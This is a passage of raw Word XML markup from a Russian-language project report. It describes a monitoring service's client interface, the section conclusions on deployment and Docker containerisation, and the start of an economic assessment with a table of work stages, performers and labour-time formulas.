      <w:r>
        <w:t>Интерфейс главной страницы клиентского приложения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B4796" w:rsidRPr="00116DFC" w:rsidRDefault="005B4796" w:rsidP="005B4796">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Главная страница содержит общую информацию о сервисе и кнопки для перехода на панель сервиса мониторинга.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116DFC" w:rsidRDefault="00064AB5" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>На рисунке 15</w:t>
      </w:r>
      <w:r w:rsidR="00116DFC">
        <w:t xml:space="preserve"> представлен интерфейс клиентского приложения, позволяющий произвести дополнительный анализ собранных </w:t>
      </w:r>
      <w:r w:rsidR="00C07405">
        <w:t>с МПУ данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116DFC" w:rsidRDefault="00116DFC" w:rsidP="00116DFC">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00116DFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5851217" cy="4195531"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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6798" cy="4199533"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116DFC" w:rsidRPr="00116DFC" w:rsidRDefault="00116DFC" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00116DFC">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Интерфейс страницы клиентского для анализа собранных данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116DFC" w:rsidRDefault="00116DFC" w:rsidP="00505B5C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Как можно заметить, данный интерфейс обладает возможностью фильтрации</w:t>
      </w:r>
      <w:r w:rsidR="002C1072" w:rsidRPr="002C1072">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C1072">
        <w:t>данных по типу, а также имеет пагинацию, для упрощения взаимодействия с интерфейсом</w:t>
      </w:r>
      <w:r w:rsidR="005B4796">
        <w:t xml:space="preserve"> и ускоряет коммуникацию между клиентским </w:t>
      </w:r>
      <w:r w:rsidR="005B4796">
        <w:lastRenderedPageBreak/>
        <w:t>и серверным приложением</w:t>
      </w:r>
      <w:r w:rsidR="002C1072">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005038B5" w:rsidRDefault="005038B5" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc61505564"/>
      <w:r>
        <w:t xml:space="preserve">Выводы </w:t>
      </w:r>
      <w:r w:rsidR="00822323">
        <w:t>третьего</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> раздела</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00A97EB2" w:rsidRDefault="00A97EB2" w:rsidP="00A97EB2">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="001354A0">
        <w:t>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D600A4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Легкость развертывания системы как для ограниченных, так и для крупно промышленных целей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44000" w:rsidRDefault="00B44000" w:rsidP="00D600A4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>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r w:rsidR="001354A0">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F046F" w:rsidRDefault="00B44000" w:rsidP="00D600A4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Возможность контейнеризации системы таким средствами, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="007343EE">
        <w:t xml:space="preserve"> и подобными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00F054DE" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc61505565"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ЭКОНОМИЧЕСКАЯ ОЦЕНКА ПРОЕКТА</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>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1E4D1C" w:rsidRPr="001E4D1C" w:rsidRDefault="001E4D1C" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc61505566"/>
      <w:r>
        <w:t>Определение списка работ и состава исполнителей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="001354A0" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">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Pr="001354A0" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">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Pr="001354A0" w:rsidRDefault="000D5530" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В таблице 16</w:t>
      </w:r>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="001354A0">
        <w:t>, приведенной ниже, содержится состав исполнителей и полный перечень работ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="000D5530" w:rsidP="00415F9B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 16</w:t>
      </w:r>
      <w:r w:rsidR="001E4D1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00375C80">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="005E3220">
        <w:t xml:space="preserve"> П</w:t>
      </w:r>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="00E64EE4">
        <w:t>еречень работ и состав исполнителей</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="4136"/>
        <w:gridCol w:w="2850"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidTr="00694A4F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidRDefault="001E4D1C" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Стадии разработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidRDefault="001E4D1C" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Наименование работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidRDefault="001E4D1C" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Ответственные исполнители</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidTr="00694A4F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidRDefault="001E4D1C" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>1. Техническое задание</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001E4D1C" w:rsidRPr="00747731" w:rsidRDefault="001E4D1C" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>1.1. Постановка задачи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1.2. Подбор и анализ технической литературы</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1.3. Сбор и анализ исходных данных</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1.4. Анализ существующих решений</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5</w:t>
            </w:r>
            <w:r w:rsidRPr="00747731">
              <w:t>. Определение этапов, сроков разработки системы и технической документации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070A6D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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6</w:t>
            </w:r>
            <w:r w:rsidRPr="00747731">
              <w:t>. Согласование и утверждение технического задания</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B10E7D" w:rsidRPr="00747731" w:rsidTr="00677E44">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>2. Эскизный проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t xml:space="preserve">2.1. </w:t>
            </w:r>
            <w:r>
              <w:t>Подготовительные работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Инженер-программист</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidTr="00070A6D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>2.2. Выбор критериев эффективности и качества системы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00415F9B">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Инженер-программист</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidTr="00B10E7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Продолжение таблица 16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidTr="00B10E7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Стадии разработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Наименование работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Ответственные исполнители</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidTr="00694A4F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>2.3. Разработка технологии тестирования и отладки</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2.4. Согласование и утверждение эскизного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3. Технический проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t xml:space="preserve">3.1. Разработка </w:t>
            </w:r>
            <w:r>
              <w:t>технического задания</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3.2. Разработка алгоритмического и программного обеспечения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3.3. Разработка интерфейса</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3.4. Согласование и утверждение технического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4. Рабочий проект</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t xml:space="preserve">4.1. </w:t>
            </w:r>
            <w:r w:rsidRPr="000E27BF">
              <w:t>Разработка программного решения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4.2. Тестирование</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> программного решения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Инженер-программист</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4.3. Отладка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 xml:space="preserve">4.4. </w:t>
            </w:r>
            <w:r>
              <w:t>Формирование</w:t>
            </w:r>
            <w:r w:rsidRPr="00747731">
              <w:t xml:space="preserve"> программной документации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4.5. Согласование и утверждение рабочего проекта</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val="restart"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>5. Внедрение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>5.1. Подготовка и передача системы и технической документации для сдачи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Pr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>5.2. Анализ данных, полученный в результате эксплуатации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Руководитель проекта</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidTr="00694A4F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>5.3. Корректировки технической документации по результатам испытаний</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00747731">
              <w:t>Руководитель проекта</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidTr="00694A4F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2358" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4136" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B10E7D" w:rsidRPr="00747731" w:rsidRDefault="00B10E7D" w:rsidP="00B10E7D">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="001E4D1C" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc61505567"/>
      <w:r w:rsidRPr="001E4D1C">
        <w:t>Расчет продолжительности и трудоемкости работ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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Default="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Трудоемкость каждого вида ра</w:t>
      </w:r>
      <w:r w:rsidR="00547371">
        <w:t>бот определяется по формуле 6</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Pr="00547371" w:rsidRDefault="00F870DF" w:rsidP="00547371">
            <w:pPr>
              <w:jc w:val="right"/>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r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
                    <w:sz w:val="32"/>
                    <w:lang w:val="en-US"/>
                  </w:rPr>
                  <m:t xml:space="preserve"> ,</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00547371" w:rsidRDefault="00547371" w:rsidP="00547371">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="00A55F04" w:rsidRDefault="001E4D1C" w:rsidP="00547371">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A55F04">
        <w:t xml:space="preserve">где </w:t>
      </w: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oMath>
      <w:r w:rsidRPr="00A55F04">
        <w:t xml:space="preserve"> – трудоемкость работ, человек-дней;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="00A55F04" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="00A55F04">
        <w:t xml:space="preserve">– минимально возможная трудоемкость выполнения отдельного вида работ в человеко-днях; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRPr="00A55F04" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="001E4D1C" w:rsidRPr="00A55F04">
        <w:t>– максимально возможная трудоемкость выполнения отдельного вида работ в человеко-днях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4D1C" w:rsidRDefault="001E4D1C" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00A55F04">
        <w:t>Продолжительность каждого вида работ в календарных днях (Ti) определяется по формуле</w:t>
      </w:r>
      <w:r w:rsidR="00547371">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55F04">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F870DF" w:rsidP="00547371">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="708"/>
              <w:jc w:val="right"/>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lang w:val="en-US"/>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lang w:val="en-US"/>
                  </w:rPr>
                  <m:t xml:space="preserve"> ,</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00547371" w:rsidRDefault="00547371" w:rsidP="00547371">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
